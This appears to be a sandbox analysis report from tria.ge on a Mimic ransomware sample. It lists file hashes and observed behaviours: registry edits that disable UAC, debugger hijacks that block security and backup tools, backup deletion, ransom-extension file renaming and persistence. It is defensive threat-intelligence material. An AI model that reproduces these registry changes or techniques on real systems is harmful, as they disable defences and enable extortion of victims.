Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
290s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15/01/2025, 22:18
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
Resource
win7-20240903-en
windows7-x64
35 signatures
300 seconds
Behavioral task
behavioral2
Sample
81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
33 signatures
300 seconds
General
-
Target
81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe
-
Size
2.6MB
-
MD5
4dedefe4431f91c920d9aaaceb99e2ee
-
SHA1
9a20559fa8a3e670c734837de16fa508d5e25b41
-
SHA256
81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72
-
SHA512
cb7d2fe42cd44f7b1c31102961c579d7ba5a6e8f5071dfdb372dade85f56572dd870f54ca32b160faa58536f0f40e4ceb39745ae076fb8d546dd358ebe96f086
-
SSDEEP
49152:wgwReifu1DBgutBPN4gJEkSBz4aPUAigHrBYlHYw/s5CH5Ie71yAmiESeJKeqy:wgwRevguPPjg946UAFLBEYw/s5CX7tmj
Malware Config
Signatures
-
Detects Mimic ransomware 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7b-37.dat family_mimic -
Mimic
Ransomware family was first exploited in the wild in 2022.
-
Mimic family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" YOURDATA.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 264 bcdedit.exe 1292 bcdedit.exe -
Renames multiple (4518) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3384 wbadmin.exe -
pid Process 3040 wbadmin.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beserver.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EnterpriseClient.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\httpd.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgrN.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlagent.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bedbh.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bengien.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pvlsvr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Raccine_x86.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\raw_agent_svc.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ssms.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdswfsafe.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\axlbridge.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopservice.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shutdown.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msexchangesa.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbirdconfig.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tv_x64.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vxmon.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdswfsafe.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBW32.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RaccineElevatedCfg.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\benetns.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\node.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgr.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SimplyConnectionManager.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TeamViewer_Service.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tv_w32.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbsnmp.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wpython.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlmangr.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tv_w32.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msexchangesa.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fbguard.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mspub.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ocomm.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBDBMgrN.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msexchangeis.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\benetns.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fdlauncher.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msftesql.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msftesql.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqbcoreservice.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tomcat6.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbeng50.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\encsvc.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsqmcons.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sqlmangr.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxServerView.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\java.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QBIDPService.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qbupdate.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsnapvss.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msftesql-exchange.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agntsvc.exe YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mydesktopqos.exe YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sysmon64.exe\Debugger = "C:\\Windows\\System32\\Systray.exe" YOURDATA.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe -
Executes dropped EXE 12 IoCs
pid Process 4572 7za.exe 4508 7za.exe 112 2ks.exe 3036 YOURDATA.exe 5112 DC.exe 3100 YOURDATA.exe 408 YOURDATA.exe 4480 YOURDATA.exe 3524 Everything.exe 4588 Everything.exe 5508 xdel.exe 5504 xdel.exe -
Loads dropped DLL 5 IoCs
pid Process 112 2ks.exe 3036 YOURDATA.exe 3100 YOURDATA.exe 408 YOURDATA.exe 4480 YOURDATA.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command YOURDATA.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell 2ks.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" 2ks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"%1\" %*" 2ks.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open 2ks.exe Key created \REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command YOURDATA.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\exefile\shell\open\command\ = "\"%1\" %*" YOURDATA.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\----Read-Me-----.txt\"" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YOURDATA = "\"C:\\Users\\Admin\\AppData\\Local\\{0ECDC9AB-A6A9-9E08-77E6-7625750CF52C}\\YOURDATA.exe\" " 2ks.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\O: Everything.exe File opened (read-only) \??\V: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\T: Everything.exe File opened (read-only) \??\N: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\B: Everything.exe File opened (read-only) \??\R: Everything.exe File opened (read-only) \??\W: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\J: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\X: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\G: Everything.exe File opened (read-only) \??\K: Everything.exe File opened (read-only) \??\Z: Everything.exe File opened (read-only) \??\E: Everything.exe File opened (read-only) \??\P: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\H: Everything.exe File opened (read-only) \??\I: Everything.exe File opened (read-only) \??\L: Everything.exe File opened (read-only) \??\S: Everything.exe File opened (read-only) \??\A: Everything.exe File opened (read-only) \??\M: Everything.exe File opened (read-only) \??\Q: Everything.exe File opened (read-only) \??\U: Everything.exe File opened (read-only) \??\Y: Everything.exe File opened (read-only) \??\M: Everything.exe -
Power Settings 1 TTPs 15 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4156 powercfg.exe 1424 powercfg.exe 4648 powercfg.exe 1524 powercfg.exe 1320 powercfg.exe 1940 powercfg.exe 4276 powercfg.exe 2940 powercfg.exe 1520 powercfg.exe 4436 powercfg.exe 3508 powercfg.exe 1788 powercfg.exe 3764 powercfg.exe 780 powercfg.exe 1660 powercfg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ul-oob.xrm-ms.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nl_135x40.svg.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp-ul-oob.xrm-ms.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or_IN\LC_MESSAGES\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PowerPointNaiveBayesCommandRanker.txt.getmydata@tutamail.com.2000USD YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\[email protected] YOURDATA.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\[email protected] YOURDATA.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] YOURDATA.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\[email protected] YOURDATA.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
pid Process 3644 powershell.exe 2296 powershell.exe 4596 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81423f5454208e958aa183c2850809620676485c63aab07d91a6f85c1d9b4e72.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YOURDATA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2ks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YOURDATA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YOURDATA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Everything.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xdel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YOURDATA.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
